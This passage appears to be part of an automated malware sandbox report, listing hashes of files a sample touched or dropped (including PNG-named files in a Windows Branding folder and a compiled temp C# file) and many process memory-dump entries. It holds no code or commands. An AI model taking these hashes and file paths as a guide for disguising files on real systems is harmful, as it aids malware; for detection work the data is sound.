baea9da2a5adf3d3555d141943d5c252
SHA1c8851e4ec4255569e88b4a1b204ab213837afabf
SHA256fe28bfd58e8997b0e017fa6c780a108630bd6ec0a65a928263764a646f690656
SHA51251e2539b3e0c8b6709c110c8c4b697f8424e79bdb5187bb025d0330f415af0bbde9a923be54e580faf1f097f1718b411bad85bd0d764eff8effc916d0b719a8c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
baea9da2a5adf3d3555d141943d5c252
SHA1c8851e4ec4255569e88b4a1b204ab213837afabf
SHA256fe28bfd58e8997b0e017fa6c780a108630bd6ec0a65a928263764a646f690656
SHA51251e2539b3e0c8b6709c110c8c4b697f8424e79bdb5187bb025d0330f415af0bbde9a923be54e580faf1f097f1718b411bad85bd0d764eff8effc916d0b719a8c
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\gzhxopf0\CSCDBCC0248C7A847EBA4688113AFEA8E2.TMPMD5
c0b2d968396e781ec16b639ef8d854ec
SHA1f4862407da18d10d1404c866f0b1b7f134bd8480
SHA256685a106757616dfd046d43ceb802001deb7cc07ef913b4673646711ebe8c5c71
SHA512ad09df30b0d630da155f4a12143a2149b63de774fef4d6668c65cd5a2f09220299f595312edbb5956001fe1e496864b68cba4b430e0dd7b3edd51dbf7ed701c1
-
\??\c:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.cmdlineMD5
6a9ce746dbc6343db54528e8258f1708
SHA1a7373d221424027ba4b6da999474a341e67a00ef
SHA2566c7d1e4e13f344bf196e175a3645e644cf6129e14b1d32c5c32c9caae8dfaa1b
SHA512e27caca198a438ff775177d06d86c49989968245d15eb1cd8f1410766f52497c6451b4072a4fab493e8f33ff6a18b1504f8b0f824d2d4375c4f69b60a0e0a906
-
\Windows\Branding\mediasrv.pngMD5
96a6c5d47b0670a98699b2b424e2e65e
SHA157a31831c368efd82801f94a1b72c7230f4288be
SHA256bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f
SHA512b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55
-
\Windows\Branding\mediasvc.pngMD5
a3da4eee0a06c45c5bec80fd959ad539
SHA1a8d2d3691af2e1af85ed8947347d0981017b7a32
SHA2568a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c
SHA5128d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b
-
memory/300-173-0x0000000000000000-mapping.dmp
-
memory/456-172-0x0000000000000000-mapping.dmp
-
memory/536-181-0x0000000000000000-mapping.dmp
-
memory/576-163-0x0000000000000000-mapping.dmp
-
memory/636-177-0x0000000000000000-mapping.dmp
-
memory/752-182-0x0000000000000000-mapping.dmp
-
memory/828-186-0x0000000000000000-mapping.dmp
-
memory/860-165-0x0000000000000000-mapping.dmp
-
memory/888-191-0x0000000000000000-mapping.dmp
-
memory/1004-189-0x0000000000000000-mapping.dmp
-
memory/1008-133-0x000000001A9E0000-0x000000001A9E1000-memory.dmpFilesize
4KB
-
memory/1008-121-0x0000000000000000-mapping.dmp
-
memory/1008-134-0x0000000002470000-0x0000000002471000-memory.dmpFilesize
4KB
-
memory/1008-131-0x000000001B770000-0x000000001B771000-memory.dmpFilesize
4KB
-
memory/1008-129-0x0000000002500000-0x0000000002501000-memory.dmpFilesize
4KB
-
memory/1008-127-0x000000001A964000-0x000000001A966000-memory.dmpFilesize
8KB
-
memory/1008-126-0x000000001A960000-0x000000001A962000-memory.dmpFilesize
8KB
-
memory/1064-157-0x0000000000000000-mapping.dmp
-
memory/1072-194-0x0000000000000000-mapping.dmp
-
memory/1084-207-0x0000000000000000-mapping.dmp
-
memory/1084-185-0x0000000000000000-mapping.dmp
-
memory/1100-64-0x0000000040FB7000-0x0000000040FB8000-memory.dmpFilesize
4KB
-
memory/1100-62-0x0000000040FB4000-0x0000000040FB6000-memory.dmpFilesize
8KB
-
memory/1100-61-0x0000000040FB2000-0x0000000040FB4000-memory.dmpFilesize
8KB
-
memory/1100-59-0x0000000041660000-0x0000000041A81000-memory.dmpFilesize
4.1MB
-
memory/1100-63-0x0000000040FB6000-0x0000000040FB7000-memory.dmpFilesize
4KB
-
memory/1116-168-0x0000000000000000-mapping.dmp
-
memory/1132-195-0x0000000000000000-mapping.dmp
-
memory/1160-78-0x0000000000000000-mapping.dmp
-
memory/1212-164-0x0000000000000000-mapping.dmp
-
memory/1212-190-0x0000000000000000-mapping.dmp
-
memory/1216-160-0x0000000000000000-mapping.dmp
-
memory/1256-167-0x0000000000000000-mapping.dmp
-
memory/1276-176-0x0000000000000000-mapping.dmp
-
memory/1288-75-0x0000000000000000-mapping.dmp
-
memory/1376-188-0x0000000000000000-mapping.dmp
-
memory/1384-206-0x0000000000000000-mapping.dmp
-
memory/1388-204-0x00000000196CA000-0x00000000196E9000-memory.dmpFilesize
124KB
-
memory/1388-203-0x00000000196C4000-0x00000000196C6000-memory.dmpFilesize
8KB
-
memory/1388-202-0x00000000196C0000-0x00000000196C2000-memory.dmpFilesize
8KB
-
memory/1388-196-0x0000000000000000-mapping.dmp
-
memory/1436-187-0x0000000000000000-mapping.dmp
-
memory/1576-183-0x0000000000000000-mapping.dmp
-
memory/1632-192-0x0000000000000000-mapping.dmp
-
memory/1672-148-0x000000001AB90000-0x000000001AB92000-memory.dmpFilesize
8KB
-
memory/1672-150-0x000000001AB94000-0x000000001AB96000-memory.dmpFilesize
8KB
-
memory/1672-142-0x0000000000000000-mapping.dmp
-
memory/1672-178-0x0000000000000000-mapping.dmp
-
memory/1684-193-0x0000000000000000-mapping.dmp
-
memory/1684-170-0x0000000000000000-mapping.dmp
-
memory/1696-174-0x0000000000000000-mapping.dmp
-
memory/1700-169-0x0000000000000000-mapping.dmp
-
memory/1708-85-0x000000001C2B0000-0x000000001C2B1000-memory.dmpFilesize
4KB
-
memory/1708-101-0x000000001AD2A000-0x000000001AD49000-memory.dmpFilesize
124KB
-
memory/1708-65-0x0000000000000000-mapping.dmp
-
memory/1708-156-0x000000001C7F0000-0x000000001C7F1000-memory.dmpFilesize
4KB
-
memory/1708-66-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmpFilesize
8KB
-
memory/1708-67-0x0000000002380000-0x0000000002381000-memory.dmpFilesize
4KB
-
memory/1708-86-0x0000000002700000-0x0000000002701000-memory.dmpFilesize
4KB
-
memory/1708-68-0x000000001ADA0000-0x000000001ADA1000-memory.dmpFilesize
4KB
-
memory/1708-69-0x00000000023C0000-0x00000000023C1000-memory.dmpFilesize
4KB
-
memory/1708-84-0x000000001B650000-0x000000001B651000-memory.dmpFilesize
4KB
-
memory/1708-82-0x0000000002410000-0x0000000002411000-memory.dmpFilesize
4KB
-
memory/1708-70-0x000000001AD20000-0x000000001AD22000-memory.dmpFilesize
8KB
-
memory/1708-71-0x000000001AD24000-0x000000001AD26000-memory.dmpFilesize
8KB
-
memory/1708-72-0x00000000023F0000-0x00000000023F1000-memory.dmpFilesize
4KB
-
memory/1708-74-0x000000001AC40000-0x000000001AC41000-memory.dmpFilesize
4KB
-
memory/1744-166-0x0000000000000000-mapping.dmp
-
memory/1744-184-0x0000000000000000-mapping.dmp
-
memory/1768-95-0x0000000002440000-0x0000000002441000-memory.dmpFilesize
4KB
-
memory/1768-94-0x000000001AB74000-0x000000001AB76000-memory.dmpFilesize
8KB
-
memory/1768-97-0x000000001AAD0000-0x000000001AAD1000-memory.dmpFilesize
4KB
-
memory/1768-99-0x000000001A9F0000-0x000000001A9F1000-memory.dmpFilesize
4KB
-
memory/1768-100-0x0000000002460000-0x0000000002461000-memory.dmpFilesize
4KB
-
memory/1768-87-0x0000000000000000-mapping.dmp
-
memory/1768-106-0x000000001B670000-0x000000001B671000-memory.dmpFilesize
4KB
-
memory/1768-93-0x000000001AB70000-0x000000001AB72000-memory.dmpFilesize
8KB
-
memory/1768-119-0x000000001B6E0000-0x000000001B6E1000-memory.dmpFilesize
4KB
-
memory/1768-120-0x000000001B6F0000-0x000000001B6F1000-memory.dmpFilesize
4KB
-
memory/1800-205-0x0000000000000000-mapping.dmp
-
memory/1856-208-0x0000000000000000-mapping.dmp
-
memory/1856-159-0x0000000000000000-mapping.dmp
-
memory/1960-161-0x0000000000000000-mapping.dmp
-
memory/2000-162-0x0000000000000000-mapping.dmp
-
memory/2028-171-0x0000000000000000-mapping.dmp
-
memory/2032-175-0x0000000000000000-mapping.dmp